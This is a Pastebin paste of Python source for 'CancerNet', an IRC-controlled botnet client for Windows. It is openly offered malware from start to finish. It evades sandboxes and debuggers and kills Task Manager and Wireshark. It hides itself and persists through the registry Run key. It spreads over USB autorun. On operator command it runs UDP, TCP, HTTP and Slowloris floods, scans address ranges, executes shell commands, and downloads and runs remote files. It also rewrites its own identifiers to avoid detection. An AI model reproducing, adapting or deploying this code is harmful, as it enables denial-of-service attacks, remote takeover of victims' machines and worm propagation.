KekSec

CancerNet Stub

Jan 22nd, 2017
865
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 19.88 KB | None | 0 0
  1. #!/usr/bin/python
  2. #-------------------------------------------------------------------------------
  3. # Name: CancerNet IRC bot V7
  4. # Purpose: IRC Bot for botnet
  5. # Notes: (polymorphic) nearly impossible to remove (or detect) without system
  6. # analysis and creation of a tool
  7. #
  8. # Author: Freak/SynthMesc @ PopulusControl (SynthMesc)
  9. #
  10. # Created: 15/01/2015
  11. # Copyright: (c) Freak 2015
  12. # Licence: GPLv3
  13. # This program is free software: you can redistribute it and/or modify
  14. # it under the terms of the GNU General Public License as published by
  15. # the Free Software Foundation, either version 3 of the License, or
  16. # (at your option) any later version.
  17. #
  18. # This program is distributed in the hope that it will be useful,
  19. # but WITHOUT ANY WARRANTY; without even the implied warranty of
  20. # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  21. # GNU General Public License for more details.
  22. #
  23. # You should have received a copy of the GNU General Public License
  24. # along with this program. If not, see <http://www.gnu.org/licenses/>.
  25. #-------------------------------------------------------------------------------
  26. import time
  27. time.sleep([RANDOMNUMBERHERE]) #delay further execution to prevent sandboxing by AVs
  28. from random import choice,randrange
  29. from base64 import b64decode
  30. from string import letters,split,rstrip
  31. import socket,subprocess,os,sys,urllib,time,threading,itertools
  32. class pJRtMXnr():
  33. def __init__(self):
  34. # ANTI DEBUG
  35. os.popen("tskill /A Sandbox*") #Anti sandbox
  36. os.popen("tskill /A Wine*") #Anti wine
  37. os.popen("tskill /A *DBG.exe") #Anti debug 1
  38. os.popen("tskill /A Debug*") #Anti debug 2
  39. # BOTKILL
  40. os.popen("taskkill /f /im msdcsc.exe") #Darkcomet botkill
  41. os.popen("taskkill /f /im svchost.exe") #Cybergate/other botkill
  42. os.popen("taskkill /f /im bot.exe") #Blackshades botkill
  43. #SETTINGS
  44. self.qHXlKBTz=self.squdbhNF(randrange (5,10)) #Generate random 8 character nick to ensure
  45. Packets=0 #Ignore this
  46. self.lzvJGQhK=0 #Ignore this too
  47. self.lwADeiuo=b64decode(b64decode("[SERVERHERE]".decode('hex').decode('hex')).decode('hex')) #Encoded irc server
  48. self.djHsNKTC=6667 #Server port
  49. self.ZoyaERuG=b64decode(b64decode("[CHANNELHERE]".decode('hex').decode('hex')).decode('hex')) #Encoded channel
  50. self.IhfIsqFG=b64decode(b64decode("[PASSWORDHERE]".decode('hex').decode('hex')).decode('hex')) #Encoded channel key
  51. self.cvECZTOr="[CANCER]"+str(self.qHXlKBTz) #Bot nickname
  52. self.eLdpmooV=str(self.qHXlKBTz) #Bot Realname
  53. self.LdkDvEjz=str(self.qHXlKBTz) #Other
  54. self.FgBgausc=os.getenv('appdata')+"\\Windows Services" #Folder for executeable
  55. self.zTzQlGDR=self.FgBgausc+"\\services.exe" #Executable
  56. self.bXivjwVX="Windows Services" #Registry key name
  57. self.useragents = ["Mozilla/5.0 (Windows NT 6.1; WOW64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  58. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  59. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  60. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  61. "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  62. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  63. "Mozilla/5.0 (Windows NT 6.1; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  64. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  65. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)",
  66. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  67. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  68. "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  69. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  70. "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  71. "Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91) App3leWebKit/53.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1",
  72. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  73. "Mozilla/5.0 (iPhone; CPU iPhone OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  74. "Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.0) Opera 7.02 Bork-edition [en]",
  75. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0",
  76. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.57.2 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2",
  77. "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6",
  78. "Mozilla/5.0 (iPad; CPU OS 5_1_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3",
  79. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; FunWebProducts; .NET CLR 1.1.4322; PeoplePal 6.2)",
  80. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.47 Safari/536.11",
  81. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)",
  82. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/536.11 (KHTML, like Gecko) Chrome/20.0.1132.57 Safari/536.11",
  83. "Mozilla/5.0 (Windows NT 5.1; rv:5.0.1) Gecko/20100101 Firefox/5.0.1",
  84. "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0)",
  85. "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.02",
  86. "Opera/9.80 (Windows NT 5.1; U; en) Presto/2.10.229 Version/11.60",
  87. "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:5.0) Gecko/20100101 Firefox/5.0",
  88. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)",
  89. "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)",
  90. "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; .NET CLR 3.5.30729)",
  91. "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  92. "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  93. "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1",
  94. "Mozilla/5.0 (Windows NT 6.1; rv:2.0b7pre) Gecko/20100921 Firefox/4.0b7pre",
  95. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.56 Safari/536.5",
  96. "Mozilla/5.0 (Windows NT 5.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  97. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
  98. "Mozilla/5.0 (Windows NT 6.1; rv:12.0) Gecko/20100101 Firefox/12.0",
  99. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 5.8 (build 4157); .NET CLR 2.0.50727; AskTbPTV/5.11.3.15590)",
  100. "Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  101. "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)",
  102. "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/534.57.5 (KHTML, like Gecko) Version/5.1.7 Safari/534.57.4",
  103. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1",
  104. "Mozilla/5.0 (Windows NT 6.0; rv:13.0) Gecko/20100101 Firefox/13.0.1"]
  105. self.WEDZgaKC() #Install
  106. threading.Thread(target=self.evqaobDM, args=()). start()
  107. self.krZuqOoS() #Start the bot
  108. def wwoHYcGX(self):
  109. return os.path.abspath(sys.argv[0])
  110. def WEDZgaKC(self): #Install features
  111. #INSTALL
  112. try:
  113. os.popen("MD \"%s\"" % self.FgBgausc)
  114. os.popen("COPY \"%s\" \"%s\"" % (self.wwoHYcGX(),self.zTzQlGDR))
  115. os.popen("ATTRIB +H +S \"%s\"" % self.FgBgausc) #Melt folder
  116. os.popen("ATTRIB +H +S \"%s\"" % self.zTzQlGDR) #Melt file
  117. os.popen("ATTRIB +H +S \"%s\"" % self.wwoHYcGX()) #Melt current (hide + system + read-only)
  118. os.popen("REG ADD \"HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /V \"%s\" /t REG_SZ /F /D \"%s\"" % (self.bXivjwVX,self.zTzQlGDR)) #Start-up through registry
  119. except:
  120. pass
  121. def evqaobDM(self):
  122. #ANTIS
  123. Antis = ["taskmgr.exe", "proccesshacker.exe", "wireshark.exe", "regedit.exe"]
  124. while 1:
  125. for Anti in Antis:
  126. Result = os.popen("taskkill /f /im " + Anti).read()
  127. try:
  128. if Result != "":
  129. self.oWLdHNqx.send("PRIVMSG %s :%s\n" % (self.BEDMD, Result))
  130. except:
  131. pass
  132. time.sleep(1)
  133.  
  134. def NYawcQJk(self,rjsmgsgB):
  135. TQoQoTBw = rjsmgsgB.split('.')
  136. kQUqgxxv = [map(int, YqvrmAfa.split('-')) for YqvrmAfa in TQoQoTBw]
  137. aZhKIvaK = [range(llemeLCF[0], llemeLCF[1] + 1) if len(llemeLCF) == 2 else llemeLCF for llemeLCF in kQUqgxxv]
  138. for VOUZIdZn in itertools.product(*aZhKIvaK):
  139. yield '.'.join(map(str, VOUZIdZn))
  140. def squdbhNF(self,SQrrWUOl):
  141. return ''.join(choice(letters) for GukfgoOr in range(SQrrWUOl))
  142.  
  143. def uVcgrMdB(self,HTdNRlTI,wqwOsYys,packetSize,pJfokfFb):
  144. #UDP flood
  145. if str(wqwOsYys).startswith("0"):
  146. NqTdiWqy=os.urandom(int(packetSize))
  147. else:
  148. NqTdiWqy="\xff"*int(packetSize)
  149. mbaHoFcq=time.time()+int(pJfokfFb)
  150. while mbaHoFcq>time.time():
  151. try:
  152. upKurXmE=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  153. if wqwOsYys==0:
  154. upKurXmE.sendto(NqTdiWqy,(HTdNRlTI, randrange(0,65535)))
  155. else:
  156. upKurXmE.sendto(NqTdiWqy,(HTdNRlTI, int(wqwOsYys)))
  157. Packets+=1
  158. except:
  159. pass
  160. self.lzvJGQhK=(Packets*65535)/1048576
  161. self.ZyUfnKmY=self.lzvJGQhK/int(self.txMeqlni[6])
  162. self.oWLdHNqx.send("PRIVMSG %s :%s packets sent. Sent %s MB, %s MB/s\n" % (self.ZoyaERuG,Packets,self.lzvJGQhK,self.ZyUfnKmY))
  163.  
  164. def trbOkDUX(self,ksTdhuPd,wqwOsYys,pJfokfFb):
  165. #Tcp connection flood
  166. mbaHoFcq=time.time()+int(pJfokfFb)
  167. Packets = 0
  168. while mbaHoFcq>time.time():
  169. try:
  170. upKurXmE=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  171. upKurXmE.connect((ksTdhuPd, int(wqwOsYys)))
  172. Packets+=1
  173. except:
  174. pass
  175. self.oWLdHNqx.send("PRIVMSG %s :Made %s connections.\n" % (self.ZoyaERuG,Packets))
  176.  
  177. def DATSulcH(self,NQrbUKHk,wqwOsYys):
  178. self.oWLdHNqx.send("PRIVMSG %s :Scanning range %s for port %s\n" % (self.ZoyaERuG,NQrbUKHk,wqwOsYys))
  179. for bVfrYZOb in self.NYawcQJk(NQrbUKHk):
  180. try:
  181. s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  182. s.connect((bVfrYZOb,int(wqwOsYys))) #Make sure ksTdhuPd is up and port is open.
  183. s.close()
  184. self.oWLdHNqx.send("PRIVMSG %s :%s\n" % (self.ZoyaERuG,bVfrYZOb))
  185. except:
  186. pass
  187. self.oWLdHNqx.send("PRIVMSG %s :Finished scanning range %s\n" % (self.ZoyaERuG,NQrbUKHk))
  188.  
  189. def DKjxyXtL(self):
  190. #USB Spread
  191. for iYGvSVSV in xrange(3,13):
  192. try:
  193. kXiTsmAM=open("%s:\\autorun.inf" % letters[iYGvSVSV],"w")
  194. kXiTsmAM.write("[autorun]\nlabel=View Files\nopen=open.exe\naction=Open Folder to View Files\n")
  195. kXiTsmAM.close()
  196. os.popen("COPY %s %s:\\open.exe" % (self.wwoHYcGX(),letters[iYGvSVSV]))
  197. os.popen("ATTRIB +H +S %s:\\autorun.inf" % letters[iYGvSVSV])
  198. os.popen("ATTRIB +H +S %s:\\open.exe" % letters[iYGvSVSV])
  199. self.oWLdHNqx.send("PRIVMSG %s :Infected drive %s:\\\n" % (self.ZoyaERuG,letters[iYGvSVSV]))
  200. except:
  201. pass
  202. def krZuqOoS(self):
  203. NeZktZqq=""
  204. self.oWLdHNqx=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  205. self.oWLdHNqx.connect((self.lwADeiuo, self.djHsNKTC))
  206. self.oWLdHNqx.send("NICK %s\n" % self.cvECZTOr)
  207. self.oWLdHNqx.send("USER %s %s bla :%s\n" % (self.eLdpmooV, self.lwADeiuo, self.LdkDvEjz))
  208. self.oWLdHNqx.send("JOIN %s %s\n" % (self.ZoyaERuG,self.IhfIsqFG))
  209. self.DKjxyXtL()
  210. while 1:
  211. NeZktZqq=NeZktZqq+self.oWLdHNqx.recv(1024)
  212. BuHzRnte=split(NeZktZqq, "\n")
  213. NeZktZqq=BuHzRnte.pop( )
  214. for self.txMeqlni in BuHzRnte:
  215. self.txMeqlni=rstrip(self.txMeqlni)
  216. self.txMeqlni=split(self.txMeqlni)
  217. if(self.txMeqlni[0]=="PING"):
  218. self.oWLdHNqx.send("PONG %s\n" % self.txMeqlni[1])
  219. self.WEDZgaKC() #Persistence
  220. self.DKjxyXtL() #USB Autorun Worm
  221. try:
  222. if self.txMeqlni[3]==":ddos.udpfood":
  223. if self.txMeqlni[5] == "0":
  224. Porty = "RAND"
  225. else:
  226. Porty = self.txMeqlni[5]
  227. self.oWLdHNqx.send("PRIVMSG %s :Starting UDP flood on %s:%s\n" % (self.ZoyaERuG,self.txMeqlni[4],Porty))
  228. threading.Thread(target=self.UDPFood, args=(self.txMeqlni[4],self.txMeqlni[5],self.txMeqlni[6],self.txMeqlni[7],)).start()
  229. elif self.txMeqlni[3]==":ddos.synflood":
  230. self.oWLdHNqx.send("PRIVMSG %s :Starting SYN flood on %s:%s\n" % (self.ZoyaERuG,self.txMeqlni[4],self.txMeqlni[5]))
  231. threading.Thread(target=self.trbOkDUX, args=(self.txMeqlni[4],self.txMeqlni[5],self.txMeqlni[6],)).start()
  232. elif self.txMeqlni[3]==":ddos.httpflood":
  233. self.oWLdHNqx.send("PRIVMSG %s :Starting HTTP flood on %s:%s\n" % (self.ZoyaERuG,self.txMeqlni[4]))
  234. threading.Thread(target=self.HTTPFlood, args=(self.txMeqlni[4],self.txMeqlni[5],self.txMeqlni[6],)).start()
  235. elif self.txMeqlni[3]==":ddos.slowloris":
  236. self.oWLdHNqx.send("PRIVMSG %s :Starting slowloris on %s:%s\n" % (self.ZoyaERuG,self.txMeqlni[4],self.txMeqlni[5]))
  237. threading.Thread(target=self.Slowloris, args=(self.txMeqlni[4],self.txMeqlni[5],self.txMeqlni[6],self.txMeqlni[7],)).start()
  238. elif self.txMeqlni[3]==":bot.scannetrange":
  239. threading.Thread(target=self.DATSulcH, args=(self.txMeqlni[4],self.txMeqlni[5],)).start()
  240. elif self.txMeqlni[3]==":bot.shell":
  241. try:
  242. fjuThODd = subprocess.Popen(self.txMeqlni[4:],stdout=subprocess.PIPE)
  243. for VWSgiNKV in iter(fjuThODd.stdout.readline,''):
  244. self.oWLdHNqx.send("PRIVMSG %s :%s\n" % (self.ZoyaERuG,VWSgiNKV))
  245. except:
  246. self.oWLdHNqx.send("PRIVMSG %s :Failed to execute command.\n" % self.ZoyaERuG)
  247. elif self.txMeqlni[3]==":bot.repack":
  248. self.dFcQEbBo()
  249. elif self.txMeqlni[3]==":http.download":
  250. try:
  251. urllib.urlretrieve(self.txMeqlni[4],self.txMeqlni[5])
  252. self.oWLdHNqx.send("PRIVMSG %s :Downloaded.\n" % (self.ZoyaERuG))
  253. except:
  254. self.oWLdHNqx.send("PRIVMSG %s :Could not download!\n" % (self.ZoyaERuG))
  255. elif self.txMeqlni[3]==":http.execute":
  256. try:
  257. urllib.urlretrieve(self.txMeqlni[4],self.txMeqlni[5])
  258. subprocess.Popen([("%s" % self.txMeqlni[5])])
  259. self.oWLdHNqx.send("PRIVMSG %s :Downloaded and executed.\n" % (self.ZoyaERuG))
  260. except:
  261. self.oWLdHNqx.send("PRIVMSG %s :Could not download or execute!\n" % (self.ZoyaERuG))
  262. elif self.txMeqlni[3]==":bot.killme":
  263. self.oWLdHNqx.send("PRIVMSG %s :Goodbye!\n" % (self.ZoyaERuG))
  264. os.popen("taskkill /f /im " + str(os.getpid())) #windows kill
  265. os.popen("kill -9 " + str(os.getpid())) #linux kill
  266. elif self.txMeqlni[3]==":bot.move":
  267. self.lwADeiuo=self.txMeqlni[4] #Server
  268. self.ZoyaERuG=self.txMeqlni[5] #Channel
  269. self.IhfIsqFG=self.txMeqlni[6] #Channel key
  270. while 1:
  271. try:
  272. self.WEDZgaKC()
  273. except:
  274. pass
  275. elif self.txMeqlni[3]==":bot.killbyname":
  276. self.oWLdHNqx.send("PRIVMSG %s :%s\n" % (self.ZoyaERuG,os.popen("taskkill /f /im %s" % self.txMeqlni[4])))
  277. self.oWLdHNqx.send("PRIVMSG %s :%s\n" % (self.ZoyaERuG,os.popen("killall -9 %s" % self.txMeqlni[4])))
  278. elif self.txMeqlni[3]==":bot.killbypid":
  279. self.oWLdHNqx.send("PRIVMSG %s :%s\n" % (self.ZoyaERuG,os.popen("taskkill /f /pid %s" % self.txMeqlni[4])))
  280. self.oWLdHNqx.send("PRIVMSG %s :%s\n" % (self.ZoyaERuG,os.popen("kill -9 %s" % self.txMeqlni[4])))
  281. elif self.txMeqlni[3]==":bot.restart":
  282. self.oWLdHNqx.send("PRIVMSG %s :Restarting!\n" % (self.ZoyaERuG))
  283. os.popen("SHUTDOWN /R /T 00") #windows restart
  284. os.popen("reboot") #linux restart
  285. elif self.txMeqlni[3]==":bot.shutdown":
  286. self.oWLdHNqx.send("PRIVMSG %s :Shutting down!\n" % (self.ZoyaERuG))
  287. os.popen("SHUTDOWN /S /T 00")
  288. except IndexError or TypeError:
  289. pass
  290.  
  291. def Slowloris(self, Target, attackPort, sockets, attackTime):
  292. endtime = time.time()+int(attackTime)
  293. Packets = 0
  294. fds = []
  295. for iteration in xrange(0, int(sockets)):
  296. fds.append("")
  297. while 1:
  298. for iteration in xrange(0, int(sockets)):
  299. fds[iteration] = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  300. try:
  301. fds[iteration].connect((Target, int(attackPort)))
  302. except:
  303. pass
  304. httppacket = "GET / HTTP/1.1\nHost: %s:%s\nUser-agent: %s\nAccept: */*\nConnection: Keep-Alive\n\n" % (Target, attackPort, choice(self.useragents))
  305. for byte in httppacket:
  306. for fd in fds:
  307. try:
  308. fd.send(byte)
  309. Packets+=1
  310. except:
  311. try:
  312. fd.connect((Target, int(attackPort)))
  313. except:
  314. pass
  315. if endtime<time.time():
  316. self.oWLdHNqx.send("PRIVMSG %s :Made %s connections!\n" % (self.ZoyaERuG, Packets))
  317. for fd in fds:
  318. try:
  319. fd.close()
  320. except:
  321. pass
  322. return
  323. time.sleep(1)
  324. Packets = 0
  325.  
  326. def HTTPFlood(self, Target, attackPort, attackTime):
  327. endtime = time.time()+int(attackTime)
  328. Packets = 0
  329. while endtime>time.time():
  330. try:
  331. httpsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  332. httpsock.connect((Target, int(attackPort)))
  333. httppacket = "GET / HTTP/1.1\nHost: %s:%s\nUser-agent: %s\nAccept: */*\nConnection: Keep-Alive\n\n" % (Target, attackPort, choice(self.useragents))
  334. httpsock.send(httppacket)
  335. httpsock.close()
  336. Packets += 1
  337. except:
  338. pass
  339. self.oWLdHNqx.send("PRIVMSG %s :Sent %s requests averaging at %d requests per second.\n" % (self.ZoyaERuG, Packets, (Packets/int(attackTime))))
  340.  
  341. def UDPFood(self, Target, attackPort, packetSize, attackTime): #Yes, I knoe it says udpfood. its a joke. sleep is quite nessasary right now
  342. #UDP flood
  343. Packets = 0
  344. if attackPort == "0":
  345. packet=os.urandom(int(packetSize))
  346. else:
  347. packet="\xff"*int(packetSize)
  348. endtime = time.time()+int(attackTime)
  349. while endtime>time.time():
  350. try:
  351. udpsock=socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
  352. if attackPort=="0":
  353. udpsock.sendto(packet,(Target, randrange(1,65535)))
  354. else:
  355. udpsock.sendto(packet,(Target, int(attackPort)))
  356. Packets+=1
  357. except:
  358. pass
  359. udpmb=(Packets*int(packetSize))/1048576
  360. udpmbs=udpmb/int(attackTime)
  361. self.oWLdHNqx.send("PRIVMSG %s :%s packets sent, %s packets/s Sent %s MB, %s MB/s\n" % (self.ZoyaERuG, Packets,(Packets/int(attackTime)),udpmb,udpmbs))
  362.  
  363. def dFcQEbBo(self):
  364. #polymorph
  365. if self.wwoHYcGX().endswith("exe"):
  366. self.oWLdHNqx.send("PRIVMSG %s :Not repacking compiled EXE!\n" % (self.ZoyaERuG))
  367. pass
  368. else:
  369. kXiTsmAM=open(argv[0],"r")
  370. SkPfqvVb=kXiTsmAM.read()
  371. kXiTsmAM.close()
  372. tPRXIETg=['LdkDvEjz', 'squdbhNF', 'squdbhNF', 'pJRtMXnr', 'krZuqOoS', 'djHsNKTC', 'MTCLjCqS', 'wwoHYcGX', 'WEDZgaKC', 'ZyUfnKmY', 'lzvJGQhK', 'uVcgrMdB', 'eLdpmooV', 'lwADeiuo', 'ksTdhuPd', 'qHXlKBTz', 'ZoyaERuG', 'nNCRXcyX', 'cvECZTOr', 'tPRXIETg', 'qoSYrsXg', 'kXiTsmAM', 'cOCaBrUO', 'UvSLWvAL', 'dFcQEbBo', 'trbOkDUX', 'upKurXmE', 'oWLdHNqx', 'mbaHoFcq', 'wqwOsYys', 'mbaHoFcq', 'pJfokfFb', 'HTdNRlTI', 'BuHzRnte', 'IhfIsqFG', 'SkPfqvVb', 'NeZktZqq', 'PDZDyIcr', 'cXVlBQPo', 'SQrrWUOl', 'iYGvSVSV', 'NqTdiWqy', 'AFrYBRhx', 'vfEjUri', 'NYawcQJk', 'rjsmgsgB', 'TQoQoTBw', 'YqvrmAfa', 'kQUqgxxv', 'aZhKIvaK', 'VOUZIdZn', 'nATvCwXH', 'bVfrYZOb', 'utfvVkYv', 'DATSulcH', 'NQrbUKHk', 'aQvbntXQ', 'txMeqlni', 'fjuThODd', 'DKjxyXtL', 'VWSgiNKV', 'GukfgoOr', 'uLRsefIV', 'llemeLCF', 'zTzQlGDR', 'FgBgausc', 'fWAffhSo', 'evqaobDM', 'JMSdYsiE', 'JtoyJZkp', 'SZwEyAvn', 'bXivjwVX', 'UQGWeDdr', 'FgBgausc', 'CyKuZgmu', 'Slowloris', 'HTTPFlood', 'UDPFood', 'attackPort', 'Target', 'endtime', 'fds', 'fd', 'Packets', 'attackPort', 'attackTime', 'udpmbs', 'udpmb', 'udpsock', 'Porty', 'Antis', 'Anti', 'Result', 'iteration', 'byte', 'httppacket', 'packetSize', 'useragents']
  373. for qoSYrsXg in tPRXIETg:
  374. SkPfqvVb=SkPfqvVb.replace(qoSYrsXg,self.squdbhNF(randrange(5,8)))
  375. cOCaBrUO=open(argv[0],"w")
  376. cOCaBrUO.write(SkPfqvVb)
  377. cOCaBrUO.close()
  378. self.oWLdHNqx.send("PRIVMSG %s :Repacked code!\n" % (self.ZoyaERuG))
  379. while 1:
  380. try:
  381. pJRtMXnr()
  382. except:
  383. time.sleep(30)
Add Comment
Please, Sign In to add comment